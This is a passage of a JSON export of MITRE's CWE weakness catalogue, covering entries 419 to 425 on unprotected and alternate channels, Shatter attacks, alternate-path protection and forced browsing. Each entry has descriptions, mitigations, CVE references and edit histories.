Use"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"419":{"attr":{"@_ID":"419","@_Name":"Unprotected Primary Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a primary channel for administration or restricted functionality, but it does not properly protect the channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not expose administrative functionnality on the user UI."},{"Phase":"Architecture and Design","Description":"Protect the administrative/restricted functionality with a strong authentication mechanism."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Primary Channel"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"383"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"}]}},"420":{"attr":{"@_ID":"420","@_Name":"Unprotected Alternate Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software protects a primary channel, but it does not use the same level of protection for an alternate channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Identify all alternate channels and use the same protection mechanisms that are used for the primary channels."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0567","Description":"DB server assumes that local clients have performed authentication, allowing attacker to directly connect to a process to load libraries and execute commands; a socket interface also exists (another alternate channel), so attack can be remote.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0567"},{"Reference":"CVE-2002-1578","Description":"Product does not restrict access to underlying database, so attacker can bypass restrictions by directly querying the database.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1578"},{"Reference":"CVE-2003-1035","Description":"User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035"},{"Reference":"CVE-2002-1863","Description":"FTP service can not be disabled even when other access controls would require it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1863"},{"Reference":"CVE-2002-0066","Description":"Windows named pipe created without authentication/access control, allowing configuration modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066"},{"Reference":"CVE-2004-1461","Description":"Router management interface spawns a separate TCP connection after authentication, allowing hijacking by attacker coming from the same IP address.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1461"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Alternate Channel"}},"Notes":{"Note":{"#text":"This can be primary to authentication errors, and resultant from unhandled error conditions.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"421":{"attr":{"@_ID":"421","@_Name":"Race Condition During Access to Alternate Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors.","Extended_Description":"This creates a race condition that allows an attacker to access the channel before the authorized user does.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0351","Description":"FTP \\"Pizza Thief\\" vulnerability. Attacker can connect to a port that was intended for use by another client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0351"},{"Reference":"CVE-2003-0230","Description":"Product creates Windows named pipe during authentication that another attacker can hijack by connecting to it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0230"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Channel Race Condition"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-354"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Alternate Channel Race Condition","attr":{"@_Date":"2008-04-11"}}}},"422":{"attr":{"@_ID":"422","@_Name":"Unprotected Windows Messaging Channel (\'Shatter\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"360","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Always verify and authenticate the source of the message."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0971","Description":"Bypass GUI and access restricted dialog box.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0971"},{"Reference":"CVE-2002-1230","Description":"Gain privileges via Windows message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1230"},{"Reference":"CVE-2003-0350","Description":"A control allows a change to a pointer for a callback function using Windows message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0350"},{"Reference":"CVE-2003-0908","Description":"Product launches Help functionality while running with raised privileges, allowing command execution using Windows message to access \\"open file\\" dialog.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0908"},{"Reference":"CVE-2004-0213","Description":"Attacker uses Shatter attack to bypass GUI-enforced protection for CVE-2003-0908.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2004-0207","Description":"User can call certain API functions to modify certain properties of privileged programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0207"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Windows Messaging Channel (\'Shatter\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP30","Entry_Name":"Missing endpoint authentication"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-402"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Design Review.&#34; Page 34"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, &#34;Shatter Attacks&#34;, Page 694"}}]},"Notes":{"Note":[{"#text":"Overlaps privilege errors and UI errors.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Possibly under-reported, probably under-studied. It is suspected that a number of publicized vulnerabilities that involve local privilege escalation on Windows systems may be related to Shatter attacks, but they are not labeled as such.","Alternate channel attacks likely exist in other operating systems and messaging models, e.g. in privileged X Windows applications, but examples are not readily available."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes, Relationship_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"423":{"attr":{"@_ID":"423","@_Name":"DEPRECATED: Proxied Trusted Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-441. All content has been transferred to CWE-441.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"deprecated this entry as a duplicate of 441"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Proxied Trusted Channel","attr":{"@_Date":"2008-11-24"}},{"#text":"DEPRECATED (Duplicate): Proxied Trusted Channel","attr":{"@_Date":"2021-07-20"}}]}},"424":{"attr":{"@_ID":"424","@_Name":"Improper Protection of Alternate Path","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"638","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Deploy different layers of protection to implement security in depth."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Path Errors"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP35","Entry_Name":"Insecure resource access"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"554"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Alternate Path Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Protect Alternate Path","attr":{"@_Date":"2010-12-13"}}]}},"425":{"attr":{"@_ID":"425","@_Name":"Direct Request (\'Forced Browsing\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.","Extended_Description":"Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"288","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"424","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"forced browsing","Description":"The \\"forced browsing\\" term could be misinterpreted to include weaknesses such as CSRF or XSS, so its use is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Read Application Data","Modify Application Data","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Operation"],"Description":"Apply appropriate access control authorizations for each access to all restricted URLs, scripts or files."},{"Phase":"Architecture and Design","Description":"Consider using MVC based frameworks such as Struts."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If forced browsing is possible, an attacker may be able to directly access a sensitive page by entering a URL similar to the following.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"JSP"},"xhtml:div":"http://somesite.com/someapplication/admin.jsp"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2144","Description":"Bypass authentication via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2144"},{"Reference":"CVE-2005-1892","Description":"Infinite loop or infoleak triggered by direct requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1892"},{"Reference":"CVE-2004-2257","Description":"Bypass auth/auth via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2257"},{"Reference":"CVE-2005-1688","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1688"},{"Reference":"CVE-2005-1697","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1697"},{"Reference":"CVE-2005-1698","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1698"},{"Reference":"CVE-2005-1685","Description":"Authentication bypass via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1685"},{"Reference":"CVE-2005-1827","Description":"Authentication bypass via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1827"},{"Reference":"CVE-2005-1654","Description":"Authorization bypass using direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1654"},{"Reference":"CVE-2005-1668","Description":"Access privileged functionality using direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1668"},{"Reference":"CVE-2002-1798","Description":"Upload arbitrary files via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1798"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Request aka \'Forced Browsing\'"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":34,"Entry_Name":"Predictable Resource Location"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP30","Entry_Name":"Missing endpoint authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"87"}}]},"Notes":{"Note":[{"#text":"Overlaps Modification of Assumed-Immutable Data (MAID), authorization errors, container errors; often primary to other weaknesses such as XSS and SQL injection.","attr":{"@_Type":"Relationship"}},{"#text":"\\"Forced browsing\\" is a step-based manipulation involving the omission of one or more steps, whose order is assumed to be immutable. The application does not verify that the first step was performed successfully before the second step. The consequence is typically \\"authentication bypass\\" or \\"path disclosure,\\" although it can be primary to all kinds of weaknesses, especially in languages such as PHP, which allow external modification of assumed-immutable variables.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean 